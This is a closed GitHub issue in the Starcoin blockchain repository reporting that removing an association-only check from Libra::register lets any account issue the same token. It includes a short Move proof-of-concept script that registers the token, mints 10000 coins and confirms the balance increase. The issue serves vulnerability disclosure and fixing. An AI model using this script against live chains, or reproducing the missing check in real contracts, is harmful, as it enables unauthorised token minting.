Security vulnerability in multi-token

starcoinorg / starcoin

Starcoin - A Move smart contract blockchain network that scales by layering

Apache License 2.0

1.38k stars 289 forks source link

Security vulnerability in multi-token #417

Closed guangyuz closed 4 years ago

guangyuz commented 4 years ago

Description: different accounts can issue same token. Reason: originally there is a check in Libra::regsister that only association can register token. To support multi-token, we removed the check.

guangyuz commented 4 years ago

use 0x0::Starcoin; use 0x0::Libra; use 0x0::LibraAccount; use 0x0::Transaction; fun main() { let balance_old = LibraAccount::balance(Transaction::sender()); Libra::register(); let coin = Libra::mint(10000); Transaction::assert(Libra::value(&coin) == 10000, 8001); LibraAccount::deposit_to_sender(coin); let balance_new = LibraAccount::balance(Transaction::sender()); Transaction::assert(balance_new == balance_old + 10000, 8003) }